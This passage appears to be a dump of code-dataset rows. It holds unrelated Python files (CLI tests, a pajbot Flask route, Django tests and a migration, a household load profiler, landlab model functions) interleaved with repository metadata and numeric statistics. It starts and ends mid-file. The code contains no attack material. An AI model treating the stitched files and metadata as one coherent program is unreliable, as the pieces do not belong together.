        'swpt_creditors', 'configure_interval', '--', '1', str(m.MAX_INT64 + 1)])
    assert result.exit_code != 0
    assert 'not a valid creditor ID' in caplog.text

    caplog.clear()
    result = runner.invoke(args=[
        'swpt_creditors', 'configure_interval', '--', '2', '1'])
    assert result.exit_code != 0
    assert 'invalid interval' in caplog.text

    caplog.clear()
    result = runner.invoke(args=[
        'swpt_creditors', 'configure_interval', '--', '-1', '1'])
    assert result.exit_code != 0
    assert 'contains 0' in caplog.text

    caplog.clear()
    result = runner.invoke(args=[
        'swpt_creditors', 'configure_interval', '--', '1', str(max_creditor_id)])
    assert result.exit_code == 0
    assert not result.output
    ac = m.AgentConfig.query.one()
    assert ac.min_creditor_id == 1
    assert ac.max_creditor_id == max_creditor_id

    caplog.clear()
    result = runner.invoke(args=[
        'swpt_creditors', 'configure_interval', '--', str(min_creditor_id), '-1'])
    assert result.exit_code == 0
    assert not result.output
    ac = m.AgentConfig.query.one()
    assert ac.min_creditor_id == min_creditor_id
    assert ac.max_creditor_id == -1
| 34.192053 | 118 | 0.654852 | 694 | 5,163 | 4.54611 | 0.213256 | 0.066561 | 0.012678 | 0.055784 | 0.533122 | 0.487797 | 0.430745 | 0.42187 | 0.395246 | 0.381933 | 0 | 0.035608 | 0.216734 | 5,163 | 150 | 119 | 34.42 | 0.74456 | 0 | 0 | 0.366412 | 0 | 0 | 0.200077 | 0.037188 | 0 | 0 | 0 | 0 | 0.167939 | 1 | 0.030534 | false | 0 | 0.030534 | 0 | 0.061069 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4f9fcdd845899468417c334c142d81c1bbc6d8 | 888 | py | Python | pajbot/web/routes/base/playsounds.py | KasperHelsted/pajbot | c366dcfc5e6076f9adcfce24c7a666653068b031 | [
"MIT"
] | null | null | null | pajbot/web/routes/base/playsounds.py | KasperHelsted/pajbot | c366dcfc5e6076f9adcfce24c7a666653068b031 | [
"MIT"
] | null | null | null | pajbot/web/routes/base/playsounds.py | KasperHelsted/pajbot | c366dcfc5e6076f9adcfce24c7a666653068b031 | [
"MIT"
] | 1 | 2020-03-11T19:37:10.000Z | 2020-03-11T19:37:10.000Z | from flask import render_template
from pajbot.managers.db import DBManager
from pajbot.models.module import Module
from pajbot.models.playsound import Playsound
from pajbot.modules import PlaysoundModule


def init(app):
    @app.route("/playsounds/")
    def user_playsounds():
        with DBManager.create_session_scope() as session:
            playsounds = session.query(Playsound).filter(Playsound.enabled).all()
            playsound_module = session.query(Module).filter(Module.id == PlaysoundModule.ID).one_or_none()
            enabled = False
            if playsound_module is not None:
                enabled = playsound_module.enabled
            return render_template(
                "playsounds.html",
                playsounds=playsounds,
                module_settings=PlaysoundModule.module_settings(),
                playsounds_enabled=enabled,
            )
| 34.153846 | 106 | 0.665541 | 92 | 888 | 6.282609 | 0.434783 | 0.069204 | 0.055363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.256757 | 888 | 25 | 107 | 35.52 | 0.875758 | 0 | 0 | 0 | 0 | 0 | 0.030405 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.25 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb50ddc7c9fdf4690ca7e9bb60ec4a0df3dd0ba9 | 1,542 | py | Python | cla_backend/apps/timer/tests/test_managers.py | uk-gov-mirror/ministryofjustice.cla_backend | 4d524c10e7bd31f085d9c5f7bf6e08a6bb39c0a6 | [
"MIT"
] | 3 | 2019-10-02T15:31:03.000Z | 2022-01-13T10:15:53.000Z | cla_backend/apps/timer/tests/test_managers.py | uk-gov-mirror/ministryofjustice.cla_backend | 4d524c10e7bd31f085d9c5f7bf6e08a6bb39c0a6 | [
"MIT"
] | 206 | 2015-01-02T16:50:11.000Z | 2022-02-16T20:16:05.000Z | cla_backend/apps/timer/tests/test_managers.py | uk-gov-mirror/ministryofjustice.cla_backend | 4d524c10e7bd31f085d9c5f7bf6e08a6bb39c0a6 | [
"MIT"
] | 6 | 2015-03-23T23:08:42.000Z | 2022-02-15T17:04:44.000Z | from django.test import TestCase
from django.utils import timezone
from django.db import IntegrityError
from django.core.exceptions import MultipleObjectsReturned

from core.tests.mommy_utils import make_recipe, make_user
from timer.models import Timer


class RunningTimerManagerTestCase(TestCase):
    def test_query_set(self):
        timer1 = make_recipe("timer.Timer", stopped=None)
        make_recipe("timer.Timer", stopped=timezone.now())
        timer3 = make_recipe("timer.Timer", stopped=None)
        make_recipe("timer.Timer", cancelled=True)

        timers = Timer.running_objects.all()
        self.assertItemsEqual(timers, [timer1, timer3])

    def test_get_by_user_fails_with_multiple_timers(self):
        try:
            user = make_user()
            make_recipe("timer.Timer", stopped=None, created_by=user, _quantity=2)
            Timer.running_objects.get_by_user(user)
        except (MultipleObjectsReturned, IntegrityError):
            pass
        else:
            self.assertTrue(False, "It should raise MultipleObjectsReturned or IntegrityError")

    def test_get_by_user_fails_when_no_timer(self):
        user = make_user()
        make_recipe("timer.Timer", stopped=timezone.now(), created_by=user)
        self.assertRaises(IndexError, Timer.running_objects.get_by_user, user)

    def test_get_by_user_returns_timer(self):
        user = make_user()
        timer = make_recipe("timer.Timer", stopped=None, created_by=user)
        self.assertEqual(Timer.running_objects.get_by_user(user), timer)
| 35.860465 | 95 | 0.713359 | 191 | 1,542 | 5.507853 | 0.319372 | 0.051331 | 0.09981 | 0.13308 | 0.431559 | 0.387833 | 0.347909 | 0.229087 | 0.180608 | 0.096958 | 0 | 0.004026 | 0.194553 | 1,542 | 42 | 96 | 36.714286 | 0.842995 | 0 | 0 | 0.096774 | 0 | 0 | 0.0869 | 0.014916 | 0 | 0 | 0 | 0 | 0.129032 | 1 | 0.129032 | false | 0.032258 | 0.193548 | 0 | 0.354839 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb51cff9c7fd98ea2e3be2188c9165fb1f513dcf | 372 | py | Python | 02-python-oo/aula-05/exemplos/train.py | opensanca/trilha-python | 9ffadd266e22a920a3c1acfdbc6a5a4645fce9d6 | [
"MIT"
] | 47 | 2016-05-19T22:37:18.000Z | 2022-02-22T02:34:18.000Z | 02-python-oo/aula-05/exemplos/train.py | opensanca/trilha-python | 9ffadd266e22a920a3c1acfdbc6a5a4645fce9d6 | [
"MIT"
] | 21 | 2016-05-20T12:35:25.000Z | 2016-07-26T00:23:33.000Z | 02-python-oo/aula-05/exemplos/train.py | lamenezes/python-intro | 9ffadd266e22a920a3c1acfdbc6a5a4645fce9d6 | [
"MIT"
] | 25 | 2016-05-19T22:52:32.000Z | 2022-01-08T15:15:36.000Z | """
Creates a Train class that has cars. The train is iterable, and each
element returned by the iteration is a string with the car number.
"""


class Train:
    def __init__(self, cars):
        self.cars = cars

    def __len__(self):  # len(train)
        return self.cars

    def __iter__(self):
        return ('car #{}'.format(i + 1) for i in range(self.cars))
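Iterating the class above yields one string per car. A quick usage check, with the class restated so the snippet is self-contained:

```python
class Train:
    def __init__(self, cars):
        self.cars = cars

    def __len__(self):
        return self.cars

    def __iter__(self):
        # A generator expression: one 1-indexed label per car.
        return ('car #{}'.format(i + 1) for i in range(self.cars))


train = Train(3)
print(len(train))    # 3
print(list(train))   # ['car #1', 'car #2', 'car #3']
```

Because `__iter__` builds a fresh generator on each call, the train can be iterated any number of times.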
| 23.25 | 73 | 0.642473 | 56 | 372 | 4.053571 | 0.696429 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003597 | 0.252688 | 372 | 15 | 74 | 24.8 | 0.81295 | 0.400538 | 0 | 0 | 0 | 0 | 0.032558 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.285714 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
bb52f0733efe5513920fdebfb1eef593a99fcd79 | 471 | py | Python | home/migrations/0003_auto_20210622_1116.py | screw-pack/hazel | ade9b6c6a396b3da2bb2d5505cfb63e1579cdab8 | [
"MIT"
] | null | null | null | home/migrations/0003_auto_20210622_1116.py | screw-pack/hazel | ade9b6c6a396b3da2bb2d5505cfb63e1579cdab8 | [
"MIT"
] | null | null | null | home/migrations/0003_auto_20210622_1116.py | screw-pack/hazel | ade9b6c6a396b3da2bb2d5505cfb63e1579cdab8 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-22 09:16
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('home', '0002_auto_20210618_1545'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='activity',
            options={'ordering': ['start_time']},
        ),
        migrations.AlterModelOptions(
            name='agenda',
            options={'ordering': ['entry']},
        ),
    ]
| 21.409091 | 49 | 0.562633 | 43 | 471 | 6.069767 | 0.790698 | 0.206897 | 0.237548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094512 | 0.303609 | 471 | 21 | 50 | 22.428571 | 0.70122 | 0.095541 | 0 | 0.266667 | 1 | 0 | 0.169811 | 0.054245 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb52f288b0e795d00e5f3bf63b427429792a24ad | 9,486 | py | Python | house_load_profiler.py | gianmarco-lorenti/RECOpt | c7916861db033f9d917d05094102194202e3bb09 | [
"MIT"
] | 8 | 2021-03-08T09:30:16.000Z | 2022-02-18T19:40:41.000Z | house_load_profiler.py | gianmarco-lorenti/RECOpt | c7916861db033f9d917d05094102194202e3bb09 | [
"MIT"
] | null | null | null | house_load_profiler.py | gianmarco-lorenti/RECOpt | c7916861db033f9d917d05094102194202e3bb09 | [
"MIT"
] | 1 | 2021-05-24T13:21:36.000Z | 2021-05-24T13:21:36.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 28 18:37:58 2020
@author: giamm
"""
# from tictoc import tic, toc
import numpy as np
import datareader #routine created to properly read the files needed in the following
from load_profiler import load_profiler as lp
###############################################################################
# This file contains a method that, for a given household (considering its
# availability of each appliance considered in this study) returns the electric
# load profile for the household during one day (1440 min), with a resolution
# of 1 minute.
###############################################################################
########## Routine
def house_load_profiler(time_dict, apps_availability, day, season, appliances_data, **params):
''' The method returns a load profile for a given household in a total simulation time of 1440 min, with a timestep of 1 min.
Inputs:
apps_availability - 1d-array, availability of each appliance for the household is stored (1 if present, 0 if not)
day - str, type of day (weekday: 'wd'| weekend: 'we')
season - str, season (summer: 's', winter: 'w', autumn or spring: 'ap')
appliances_data - dict, various input data related to the appliances
params - dict, simulation parameters
Outputs:
house_load_profile - 1d-array, load profile for the household (W)
energy - 1d-array, energy consumed by each appliance in one day (Wh/day)
'''
## Time
# Time discretization for the simulation
# Time-step (min)
dt = time_dict['dt']
# Total time of simulation (min)
time = time_dict['time']
# Vector of time from 00:00 to 23:59 (one day) (min)
time_sim = time_dict['time_sim']
## Parameters
# Simulation parameters that can be changed from the user
# Contractual power for each household (W)
power_max = params['power_max']*1000
## Input data for the appliances
# Appliances' attributes, energy consumptions and user's coefficients
# apps is a 2d-array in which, for each appliance (rows) and attribute value is given (columns)
apps_ID = appliances_data['apps_ID']
# apps_attr is a dictionary in which the name of each attribute (value) is linked to its columns number in apps (key)
apps_attr = appliances_data['apps_attr']
## Household's load profile
# Generating the load profile for the house, considering which appliances are available
# Initializing the power vector for the load profile (W)
house_load_profile = np.zeros(np.shape(time_sim))
# Initializing the vector where to store the energy consumption from each appliance (Wh/day)
energy = np.zeros(len(apps_ID))
# Using the method load_profiler(lp) to get the load profile for each appliance
for app in apps_ID:
# The ID number of the appliance is stored in a variable since it will be used man times
app_ID = apps_ID[app][apps_attr['id_number']]
# Skipping appliances that are not present in the household
if apps_availability[app_ID] == 0:
continue
load_profile = lp(time_dict, app, day, season, appliances_data, **params) #load_profile has to outputs (time and power)
# In case the instantaneous power exceedes the maximum power, some tries
# are made in order to change the moment in which the next appliance is
# switched on (since it is evaluated randomly, according to the cumulative
# frequency of utilization for that appliance)
count = 0
maxtries = 10
duration_indices = np.size(load_profile[load_profile > 0])
while np.any(house_load_profile + load_profile > power_max) and count < maxtries:
switch_on_index = np.size((house_load_profile + load_profile)[house_load_profile + load_profile > power_max])
roll_step = int((duration_indices + switch_on_index)/2)
load_profile = np.roll(load_profile, roll_step)
count += 1
# Evaluating the energy consumption from each appliance by integrating
# the load profile over the time. Since the time is in minutes, the
# result is divided by 60 in order to obtain Wh.
energy[app_ID] = np.trapz(load_profile,time_sim)/60
# Injecting the power demand from each appliance into the load profile of the household
house_load_profile[:] = house_load_profile[:] + load_profile
# In case the which loop failed, the instantaneous power is saturated to the
# maximum power anyway. This may happen because the last appliance to be considered
# is the lighting, which is of "continuous" type, therefore its profile does
# not depend on a cumulative frequency (they are always on)
house_load_profile[house_load_profile > power_max] = power_max
return(house_load_profile,energy)
#####################################################################################################################
# ## Uncomment the following lines to test the function
# import matplotlib.pyplot as plt
# from tictoc import tic, toc
# # Time-step, total time and vector of time from 00:00 to 23:59 (one day) (min)
# dt = 1
# time = 1440
# time_sim = np.arange(0,time,dt)
# # Creating a dictionary to be passed to the various methods, containing the time discretization
# time_dict = {
# 'time': time,
# 'dt': dt,
# 'time_sim': time_sim,
# }
# apps, apps_ID, apps_attr = datareader.read_appliances('eltdome_report.csv',';','Input')
# ec_yearly_energy, ec_levels_dict = datareader.read_enclasses('classenerg_report.csv',';','Input')
# coeff_matrix, seasons_dict = datareader.read_enclasses('coeff_matrix.csv',';','Input')
# apps_avg_lps = {}
# apps_dcs = {}
# for app in apps_ID:
# # app_nickname is a 2 or 3 characters string identifying the appliance
# app_nickname = apps_ID[app][apps_attr['nickname']]
# # app_type depends from the work cycle for the appliance: 'continuous'|'no_duty_cycle'|'duty_cycle'|
# app_type = apps_ID[app][apps_attr['type']]
# # app_wbe (weekly behavior), different usage of the appliance in each type of days: 'wde'|'we','wd'
# app_wbe = apps_ID[app][apps_attr['week_behaviour']]
# # app_sbe (seasonal behavior), different usage of the appliance in each season: 'sawp'|'s','w','ap'
# app_sbe = apps_ID[app][apps_attr['season_behaviour']]
# # Building the name of the file to be opened and read
# fname_nickname = app_nickname
# fname_type = 'avg_loadprof'
# apps_avg_lps[app] = {}
# for season in app_sbe:
# fname_season = season
# for day in app_wbe:
# fname_day = day
# filename = '{}_{}_{}_{}.csv'.format(fname_type, fname_nickname, fname_day, fname_season)
# # Reading the time and power vectors for the load profile
# data_lp = datareader.read_general(filename,';','Input')
# # Time is stored in hours and converted to minutes
# time_lp = data_lp[:, 0]
# time_lp = time_lp*60
# # Power is already stored in Watts, it corresponds to the load profile
# power_lp = data_lp[:, 1]
# load_profile = power_lp
# # Interpolating the load profile if it has a different time-resolution
# if (time_lp[-1] - time_lp[0])/(np.size(time_lp) - 1) != dt:
# load_profile = np.interp(time_sim, time_lp, power_lp, period = time)
# apps_avg_lps[app][(season, day)] = load_profile
# if app_type == 'duty_cycle':
# fname_type = 'dutycycle'
# filename = '{}_{}.csv'.format(fname_type, fname_nickname)
# # Reading the time and power vectors for the duty cycle
# data_dc = datareader.read_general(filename, ';', 'Input')
# # Time is already stored in minutes
# time_dc = data_dc[:, 0]
# # Power is already stored in Watts, it corresponds to the duty cycle
# power_dc = data_dc[:, 1]
# duty_cycle = power_dc
# # Interpolating the duty-cycle, if it has a different time resolution
# if (time_dc[-1] - time_dc[0])/(np.size(time_dc) - 1) != dt:
# time_dc = np.arange(time_dc[0], time_dc[-1] + dt, dt)
# duty_cycle = np.interp(time_dc, power_dc)
# apps_dcs[app] = {'time_dc': time_dc,
# 'duty_cycle': duty_cycle}
# appliances_data = {
# 'apps': apps,
# 'apps_ID': apps_ID,
# 'apps_attr': apps_attr,
# 'ec_yearly_energy': ec_yearly_energy,
# 'ec_levels_dict': ec_levels_dict,
# 'coeff_matrix': coeff_matrix,
# 'seasons_dict': seasons_dict,
# 'apps_avg_lps': apps_avg_lps,
# 'apps_dcs': apps_dcs,
# }
# params = {
# 'power_max': 3,
# 'en_class': 'D',
# 'toll': 15,
# 'devsta': 2,
# 'ftg_avg': 100
# }
# apps_availability = np.ones(17)
# day = 'wd'
# season = 's'
# house_load_profile, energy = house_load_profiler(time_dict, apps_availability, day, season, appliances_data, **params)
# plt.bar(time_sim,house_load_profile,width=dt,align='edge')
# plt.show()
###################################################################################################################################### | 37.2 | 134 | 0.621969 | 1,267 | 9,486 | 4.479084 | 0.240726 | 0.073656 | 0.033833 | 0.011454 | 0.221322 | 0.170573 | 0.14185 | 0.09304 | 0.065903 | 0.052863 | 0 | 0.012665 | 0.242568 | 9,486 | 255 | 134 | 37.2 | 0.777175 | 0.731499 | 0 | 0 | 0 | 0 | 0.025065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.103448 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb542cac2a03cdb3c031650c9fa28df93e7a1256 | 309 | py | Python | ex9-11.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex9-11.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex9-11.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | from admins import Admin, Privileges
eric = Admin('eric', 'matthes', 'e_mattches', 'e_mattches@example.com', 'alaska')
eric_privileges = [
'can reset passwords',
'can moderate discussions',
'can suspend accounts',
]
eric.privileges.privileges = eric_privileges
eric.privileges.show_privileges()
| 25.75 | 81 | 0.734628 | 36 | 309 | 6.166667 | 0.555556 | 0.252252 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139159 | 309 | 11 | 82 | 28.090909 | 0.834586 | 0 | 0 | 0 | 0 | 0 | 0.36246 | 0.071197 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
bb5494d212a707197321c71bdad0900003edabec | 1,201 | py | Python | sample_synth02/make_config.py | clinfo/DeepKF | ee4f1be28e5f3bfa46bb47dbdc4d5f678eed36c1 | [
"MIT"
] | 5 | 2019-12-19T13:33:36.000Z | 2021-06-01T06:08:16.000Z | sample_synth02/make_config.py | clinfo/DeepKF | ee4f1be28e5f3bfa46bb47dbdc4d5f678eed36c1 | [
"MIT"
] | 24 | 2020-03-03T19:40:55.000Z | 2021-05-26T15:27:38.000Z | sample_synth02/make_config.py | clinfo/DeepKF | ee4f1be28e5f3bfa46bb47dbdc4d5f678eed36c1 | [
"MIT"
] | 1 | 2019-12-19T13:35:07.000Z | 2019-12-19T13:35:07.000Z | import numpy as np
import os
import json
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt

os.makedirs("data", exist_ok=True)
np.random.seed(10)

filename = "config_base.json"
o = json.load(open(filename))
print(o)
for j in range(10):
    i = j + 1
    o['data_train_npy'] = 'data/data_train.n' + str(i) + '.npy'
    o['data_test_npy'] = 'data/data_test.n' + str(i) + '.npy'
    path = "experiments/result_base_" + str(i) + "/"
    o["result_path"] = path
    os.makedirs(path, exist_ok=True)
    cfg_path = "experiments/config/"
    os.makedirs(cfg_path, exist_ok=True)
    filename = cfg_path + "/config_base" + str(i) + ".json"
    print(filename)
    with open(filename, "w") as f:
        json.dump(o, f)

filename = "config_pot.json"
o = json.load(open(filename))
print(o)
for j in range(10):
    i = j + 1
    o['data_train_npy'] = 'data/data_train.n' + str(i) + '.npy'
    o['data_test_npy'] = 'data/data_test.n' + str(i) + '.npy'
    path = "experiments/result_pot_" + str(i) + "/"
    o["result_path"] = path
    os.makedirs(path, exist_ok=True)
    cfg_path = "experiments/config/"
    os.makedirs(cfg_path, exist_ok=True)
    filename = cfg_path + "/config_pot" + str(i) + ".json"
    print(filename)
    with open(filename, "w") as f:
        json.dump(o, f)
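The script follows a simple templating pattern: load a base config once, mutate a few fields per experiment, and dump one JSON file per run. A self-contained sketch of the same pattern, using only the standard library and a temporary directory (the field names mirror the script above; the base dict is a stand-in for the loaded `config_base.json`):

```python
import json
import os
import tempfile

base = {'data_train_npy': '', 'result_path': ''}
out_dir = tempfile.mkdtemp()

paths = []
for i in range(1, 4):
    cfg = dict(base)  # copy, so each experiment gets an independent dict
    cfg['data_train_npy'] = 'data/data_train.n{}.npy'.format(i)
    cfg['result_path'] = 'experiments/result_base_{}/'.format(i)
    path = os.path.join(out_dir, 'config_base{}.json'.format(i))
    with open(path, 'w') as f:
        json.dump(cfg, f)
    paths.append(path)

print(len(paths))  # 3
```

Note one design choice: the original script mutates the single loaded dict `o` in place on every iteration, which works because the file is dumped before the next mutation; copying per iteration, as here, avoids any aliasing surprises if the dicts are kept around.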
| 25.020833 | 57 | 0.673605 | 201 | 1,201 | 3.860697 | 0.228856 | 0.041237 | 0.070876 | 0.041237 | 0.762887 | 0.762887 | 0.762887 | 0.762887 | 0.762887 | 0.762887 | 0 | 0.007744 | 0.139883 | 1,201 | 47 | 58 | 25.553191 | 0.743466 | 0 | 0 | 0.65 | 0 | 0 | 0.265221 | 0.039199 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
bb55579c6f96ecbc21cea483d25ad02b38e7aa01 | 92 | py | Python | plot_bokeh/__init__.py | amarkpayne/ampayne_tools | a47e9baa70edaedfb655ab51f79bf5035eaacd83 | [
"MIT"
] | null | null | null | plot_bokeh/__init__.py | amarkpayne/ampayne_tools | a47e9baa70edaedfb655ab51f79bf5035eaacd83 | [
"MIT"
] | null | null | null | plot_bokeh/__init__.py | amarkpayne/ampayne_tools | a47e9baa70edaedfb655ab51f79bf5035eaacd83 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, print_function
from plot_bokeh.plot_bokeh import *
| 23 | 54 | 0.858696 | 13 | 92 | 5.461538 | 0.615385 | 0.253521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 92 | 3 | 55 | 30.666667 | 0.865854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
bb5619127572d5c7abef2ce8289d84bfdb46675d | 6,075 | py | Python | content/model_funcs.py | nathanlyons/sensitivity_analysis_clinic_CSDMS_2019 | ca1ae2cdc5239bae755929f6a92d669a82192813 | ["MIT"]
"""Model functions for the sensitivity analysis clinic at CSDMS 2019.
Written by Nathan Lyons, May 2019
"""
from os.path import join
from landlab import RasterModelGrid
from landlab.components import FastscapeEroder, FlowAccumulator, LinearDiffuser
from landlab.io import write_esri_ascii
import numpy as np
import experiment_funcs as ef
def calculate_factor_values(levels):
"""Calculate values of trial factors.
Parameters
----------
levels : dictionary
The factor levels of the trial.
Returns
-------
dictionary
Calculated factor values.
"""
# Set parameters based on factor levels.
f = {
'U': 10**levels['U_exp'],
'K': 10**levels['K_exp'],
'D': 10**levels['D_exp'],
'base_level_fall': 10**levels['base_level_fall']}
return f
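A quick standalone check of the log10 mapping used by `calculate_factor_values` (the exponent levels below are made-up example values, not ones from the clinic):

```python
# Each trial factor is 10 raised to its level exponent.
levels = {'U_exp': -4, 'K_exp': -5, 'D_exp': -2, 'base_level_fall': 1}
f = {
    'U': 10**levels['U_exp'],
    'K': 10**levels['K_exp'],
    'D': 10**levels['D_exp'],
    'base_level_fall': 10**levels['base_level_fall'],
}
assert abs(f['U'] - 1e-4) < 1e-16
assert f['base_level_fall'] == 10
```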
def run_model(f, output_path):
"""Run a trial of the base level fall model.
Parameters
----------
f : dictionary
Model trial factors.
output_path : string
Path where outputs will be saved.
"""
# Set parameters.
nrows = 200
ncols = 100
dx = 100
dt = 1000
# Create initial topography with random elevation values.
mg = RasterModelGrid(nrows, ncols, dx)
z = mg.add_zeros('node', 'topographic__elevation')
np.random.seed(1)
z += np.random.rand(z.size)
mg.set_closed_boundaries_at_grid_edges(right_is_closed=True,
top_is_closed=False,
left_is_closed=True,
bottom_is_closed=False)
# Instantiate model components.
fa = FlowAccumulator(mg, flow_director='D8')
sp = FastscapeEroder(mg, K_sp=f['K'], m_sp=0.5, n_sp=1)
ld = LinearDiffuser(mg, linear_diffusivity=f['D'], deposit=False)
# Set variables to evaluate presence of steady state.
initial_conditions_set = False
at_steady_state = False
relief_record = []
recent_mean = []
recent_std = []
step = 0
    # Set `steps_ss`, the number of time steps in the trailing window used to
    # evaluate steady state.
steps_ss = 1000
# Create a dictionary to store responses.
response = {}
# Run model until steady state is reached.
uplift_per_step = f['U'] * dt
core_mask = mg.node_is_core()
print('Running model until elevation reaches steady state.')
while not at_steady_state:
fa.run_one_step()
sp.run_one_step(dt)
ld.run_one_step(dt)
z[core_mask] += uplift_per_step
at_steady_state = check_steady_state(step * dt, z, step, steps_ss,
relief_record, recent_mean,
recent_std)
if at_steady_state and not initial_conditions_set:
initial_conditions_set = True
# Save elevation of the initial conditions.
fn = join(output_path, 'initial_conditions_elevation.asc')
write_esri_ascii(fn, mg, ['topographic__elevation'], clobber=True)
# Retain steady state relief, `relief_ss`.
z_core = z[mg.core_nodes]
relief_ss = z_core.max() - z_core.min()
response['relief_at_steady_state'] = relief_ss
# Find steady state divide position.
divide_y_coord_initial = get_divide_position(mg)
# Perturb elevation.
base_level_nodes = mg.y_of_node == 0
z[base_level_nodes] -= f['base_level_fall']
at_steady_state = False
elif at_steady_state and initial_conditions_set:
response['time_back_to_steady_state'] = step * dt
# Get divide migration distance.
divide_y_coord_final = get_divide_position(mg)
d = divide_y_coord_final - divide_y_coord_initial
response['divide_migration_distance'] = d
# Save final elevation.
fn = join(output_path, 'final_elevation.asc')
write_esri_ascii(fn, mg, ['topographic__elevation'], clobber=True)
# Advance step counter.
step += 1
# Write response to file.
path_r = join(output_path, 'response.csv')
ef.write_data(response, path_r)
def check_steady_state(time, z, step, step_win, relief_record, recent_mean,
recent_std):
relief_record.append(z.max() - z.min())
if step < step_win:
        # If fewer than `step_win` time steps have occurred, calculate the
        # running mean and standard deviation over the entire elapsed period.
recent_mean.append(np.mean(relief_record))
recent_std.append(np.std(relief_record))
else:
# If more than `step_win` time steps have occurred, calculate the
# running mean and standard deviation over the most recent `step_win`
# time steps.
recent_mean.append(np.mean(relief_record[-step_win:]))
recent_std.append(np.std(relief_record[-step_win:]))
mean_pct_change = (np.abs(recent_mean[-1] - recent_mean[-step_win]) /
np.abs(recent_mean[-1] + recent_mean[-step_win]))
std_pct_change = (np.abs(recent_std[-1] - recent_std[-step_win]) /
np.abs(recent_std[-1] + recent_std[-step_win]))
# If the percent change is less than 1% for both the mean and
# standard deviation, flag the system as at steady state.
thresh = 0.01
minor_mean_change = mean_pct_change < thresh
minor_std_change = std_pct_change < thresh or recent_std[-1] == 0
at_steady_state = minor_mean_change and minor_std_change
if step % 1e3 == 0 or at_steady_state:
print('ss_check:', 'time', time, 'mean_pct_change',
